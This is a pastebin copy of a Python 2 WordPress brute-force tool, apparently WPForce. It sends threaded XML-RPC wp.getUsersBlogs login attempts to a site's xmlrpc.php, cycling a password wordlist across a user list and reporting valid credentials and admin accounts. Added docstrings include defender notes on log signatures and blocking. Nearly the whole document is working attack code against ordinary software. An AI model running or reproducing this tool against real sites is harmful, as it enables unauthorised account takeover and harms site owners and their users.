
Untitled

a guest
Mar 25th, 2019
  1. import re
  2. import sys
  3. import time
  4. import socket
  5. import urllib2
  6. import argparse
  7. import threading
  8. from urlparse import urljoin
  9.  
__author__ = 'n00py'
# Module-level state shared by every worker thread.
# correct_pairs maps a username to the password that was accepted for it;
# worker() reads it and PasswordAttempt() writes it.
correct_pairs = {}
# Progress counter that main() polls against len(passlist).
total = 0
  14.  
def has_colours(stream):
    """Report whether *stream* is a terminal that supports more than two colours.

    Returns False for objects without ``isatty``, for non-TTY streams, and
    whenever the curses capability lookup fails for any reason.
    """
    is_terminal = hasattr(stream, "isatty") and stream.isatty()
    if not is_terminal:
        return False  # auto colour only on TTYs
    try:
        import curses
        curses.setupterm()
        colour_count = curses.tigetnum("colors")
    except:
        # Any failure (no curses, no terminfo entry, ...) means "no colour".
        return False
    return colour_count > 2
# Rebinds the name has_colours from the function above to its boolean result
# for sys.stdout; printout() reads this flag.
has_colours = has_colours(sys.stdout)
# Colour indices 0-7; printout() adds 30 to build the ANSI foreground code.
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
  28.  
  29.  
def printout(text, colour=WHITE):
    """Write *text* to stdout, wrapped in a bold ANSI colour when supported.

    ``colour`` is one of the module's 0-7 colour indices. No newline is added.
    """
    if not has_colours:
        # Plain output for pipes, files and colour-less terminals.
        sys.stdout.write(text)
        return
    sys.stdout.write("\x1b[1;%dm" % (30+colour) + text + "\x1b[0m")
  36.  
  37.  
def slice_list(input, size):
    """Split *input* into *size* consecutive lists of near-equal length.

    The first ``len(input) % size`` lists receive one extra element, and the
    original order is kept. Raises ZeroDivisionError when *size* is 0.
    """
    item_count = len(input)
    # Floor division matches the Python 2 integer "/" used by this script.
    base_len = item_count // size
    extras = item_count % size
    source = iter(input)
    chunks = []
    for position in range(size):
        chunk_len = base_len + (1 if position < extras else 0)
        chunks.append([next(source) for _ in range(chunk_len)])
    return chunks
  52.  
  53.  
def worker(wordlist,thread_no,url,userlist,verbose,debug,agent):
    """Thread body: try this thread's slice of passwords against every user.

    The outer loop walks the passwords in ``wordlist`` and the inner loop walks
    ``userlist``, so each password is sent for all usernames before the next
    password is used. A pair is skipped when the username already has an entry
    in ``correct_pairs`` or when either value is the empty string.

    Defender note: because of that ordering, failed logins are spread across
    accounts. Counting failures per source address on xmlrpc.php sees the whole
    burst, while a per-account counter sees only a fraction of it.
    """
    global total
    global correct_pairs
    for n in wordlist:
        # index() returns the first position of n, so user/password below are
        # the same values as x and n.
        current_pass = wordlist.index(n)
        for x in userlist:
            current_user = userlist.index(x)
            user = userlist[current_user]
            password = wordlist[current_pass]
            if user not in correct_pairs:
                if user != "":
                    if password != "":
                        PasswordAttempt(user,password,url,thread_no,verbose,debug,agent)
        # NOTE(review): the paste lost its indentation. This increment is placed
        # at the per-password level because main() compares total with
        # len(passlist); confirm against the upstream file.
        total += 1
  68.  
  69.  
def BuildThreads(list_array,url,debug,userlist,verbose,agent):
    """Start one daemon thread per entry of ``list_array``, each running worker().

    ``list_array`` is the list of password slices; thread ``i`` receives slice
    ``i`` together with the full ``userlist``. With ``debug`` set, every slice is
    printed first. The threads are started but not joined here.
    """
    if debug:
        print "Here is the content of the wordlists for each thread"
        for i in range(len(list_array)):
            print "Thread " + str(i)
            printout(str(list_array[i]), YELLOW)
            print "\n-----------------------------------------------------"
    threads = []
    for i in range(len(list_array)):
        t = threading.Thread(target=worker, args=(list_array[i], i, url,userlist,verbose,debug,agent))
        # Daemon threads do not keep the process alive once main() returns.
        t.daemon = True
        threads.append(t)
        t.start()
  83.  
  84.  
def PrintBanner(input,wordlist,url,userlist,passlist):
    """Print the tool banner followed by a summary of the run's inputs.

    ``input`` and ``wordlist`` are the file names given on the command line;
    ``userlist`` and ``passlist`` are the loaded lists, used only for their
    lengths. ``url`` is printed as supplied.
    """
    # NOTE(review): the ASCII-art spacing was collapsed when this page was
    # extracted; the literal is reproduced as it appears in the listing.
    banner = """\
,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || | v.1.0.0
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~
"""
    print banner
    print ("Username List: %s" % input) + " (" + str(len(userlist)) + ")"
    print ("Password List: %s" % wordlist) + " (" + str(len(passlist)) + ")"
    print ("URL: %s" % url)
  100.  
  101.  
def TestSite(url):
    """Probe ``url`` once and decide whether the run should continue.

    After protocheck() validates the scheme, a single GET is issued with a
    3 second timeout. An HTTP 405 reply is treated as proof that the XML-RPC
    endpoint exists. A 404, any other URLError, or a socket timeout ends the
    process via sys.exit().

    Defender note: this preliminary GET to xmlrpc.php precedes the POST burst in
    the access log, and answering it with 404 stops the tool at this point.
    """
    protocheck(url)
    print "Trying: " + url
    try:
        urllib2.urlopen(url, timeout=3)
    except urllib2.HTTPError, e:
        # XML-RPC endpoints reject GET; 405 is what this tool looks for.
        if e.code == 405:
            print url + " found!"
            print "Now the brute force will begin! >:)"
        if e.code == 404:
            printout(str(e), YELLOW)
            print " - XMLRPC has been moved, removed, or blocked"
            sys.exit()
    except urllib2.URLError, g:
        printout("Could not identify XMLRPC. Please verify the domain.\n", YELLOW)
        sys.exit()
    except socket.timeout as e:
        print type(e)
        printout("The socket timed out, try it again.", YELLOW)
        sys.exit()
  122.  
  123.  
def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):
    """Send one XML-RPC login attempt for ``user``/``password`` to ``url``.

    The request is a POST whose body calls ``wp.getUsersBlogs`` with the two
    values as string parameters. A response body containing ``isAdmin`` is
    treated as a successful login and the pair is stored in ``correct_pairs``.
    Any other body is ignored silently.

    Defender notes, all visible in this function:
      * every guess is a separate POST to xmlrpc.php with methodName
        wp.getUsersBlogs, so request-body or WAF logging can match on it;
      * the headers are fixed to 'Connection: keep-alive' and
        'Accept: text/html', plus the caller-supplied User-Agent;
      * an HTTP 403 or 404 reply, or a socket error, makes the calling thread
        stop, so blocking or rate-limiting xmlrpc.php ends the run.
    """
    global passlist
    if verbose is True or debug is True:
        if debug is True:
            thready = "[Thread " + str(thread_no) + "]"
            printout(thready, YELLOW)
        print "Trying " + user + " : " + password + "\n",
    headers = {'User-Agent': agent,
               'Connection': 'keep-alive',
               'Accept': 'text/html'
               }
    post = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>" + user + "</string></value></param><param><value><string>" + password + "</string></value></param></params></methodCall>"
    try:
        req = urllib2.Request(url, post, headers)
        response = urllib2.urlopen(req, timeout=3)
        the_page = response.read()
        look_for = "isAdmin"
        try:
            # [1] raises IndexError when the marker is absent; the bare except
            # below turns that into "attempt failed, say nothing".
            splitter = the_page.split(look_for, 1)[1]
            correct_pairs[user] = password
            print "--------------------------"
            success = "[" + user + " : " + password + "] are valid credentials! "
            adminAlert = ""
            # The character at offset 23 after the marker is read as the
            # isAdmin flag value.
            if splitter[23] == "1":
                adminAlert = "- THIS ACCOUNT IS ADMIN"
            printout(success, GREEN)
            printout(adminAlert, RED)
            print "\n--------------------------"
        except:
            pass
    except urllib2.URLError, e:
        if e.code == 404 or e.code == 403:
            global total
            printout(str(e), YELLOW)
            print " - WAF or security plugin likely in use"
            # total is set to the value main()'s progress loop compares against.
            total = len(passlist)
            sys.exit()
        else:
            printout(str(e), YELLOW)
            print " - Try reducing Thread count "
            if args.verbose is True or args.debug is True:
                print user + ":" + password + " was skipped"
    except socket.timeout as e:
        printout(str(e), YELLOW)
        print " - Try reducing Thread count "
        if args.verbose is True or args.debug is True:
            print user + ":" + password + " was skipped"
    except socket.error as e:
        printout(str(e), YELLOW)
        print " - Got an RST, Probably tripped the firewall\n",
        total = len(passlist)
        sys.exit()
  176.  
  177.  
def protocheck(url):
    """Exit with a warning unless *url* starts with an http:// or https:// URL.

    Returns None when the pattern matches at the start of *url*.
    """
    scheme_check = re.compile("http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
    if scheme_check.match(url) is not None:
        return
    printout("Incorrect URL. Please include the protocol in the URL.\n", YELLOW)
    sys.exit()
  183.  
def main():
    """Parse the command line, load the lists, start the threads, report results.

    Defender notes, all visible in the argument defaults below:
      * the default User-Agent is the literal "WPForce Wordpress Attack Tool 1.0".
        It is easy to match in access logs, but -a overrides it, so its absence
        proves nothing;
      * the target path is always /xmlrpc.php at the host root (see urljoin);
      * the default is 10 concurrent threads.
    """
    parser = argparse.ArgumentParser(description='This is a tool to brute force Worpress using the Wordpress API')
    users = parser.add_mutually_exclusive_group(required=True)
    users.add_argument('-i','--input', help='Input file name')
    users.add_argument('-si' '--singleinput', help='Input list of users', action='store', dest='singleinput', nargs='+')
    parser.add_argument('-w','--wordlist',help='Wordlist file name', required=True)
    parser.add_argument('-u','--url',help='URL of target', required=True)
    parser.add_argument('-v','--verbose',help=' Verbose output. Show the attemps as they happen.', required=False, action='store_true')
    parser.add_argument('-t','--threads',help=' Determines the number of threads to be used, default is 10', type=int, default=10, required=False)
    parser.add_argument('-a','--agent',help=' Determines the user-agent', type=str, default="WPForce Wordpress Attack Tool 1.0", required=False)
    parser.add_argument('-d','--debug',help=' This option is used for determining issues with the script.', action='store_true', required=False)
    args = parser.parse_args()

    url = args.url
    # The leading slash makes urljoin discard any path in the supplied URL.
    url = urljoin(url, '/xmlrpc.php')

    if args.input:
        # One username per line; the file handle is not closed explicitly.
        userlist = open(args.input, 'r').read().split('\n')
    else:
        printout("Remember to pass usernames in space delimited form!\n", YELLOW)
        userlist = args.singleinput

    totalusers = len(userlist)

    # One password per line; the file handle is not closed explicitly.
    passlist = open(args.wordlist, 'r').read().split('\n')

    PrintBanner(args.input,args.wordlist,args.url,userlist,passlist)
    TestSite(url)

    # One password slice per thread; every thread gets the full user list.
    list_array = slice_list(passlist, args.threads)
    BuildThreads(list_array,url,args.debug,userlist,args.verbose,args.agent)
    # Poll the shared counters every 0.1 s and redraw the progress line.
    while (len(correct_pairs) <= totalusers) and (len(passlist) > total):
        time.sleep(0.1)
        sys.stdout.flush()
        percent = "%.0f%%" % (100 * (total)/len(passlist))
        print " " + percent + " Percent Complete\r",

    print "\nAll correct pairs:"
    printout(str(correct_pairs), GREEN)
    print ""
  224.  
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()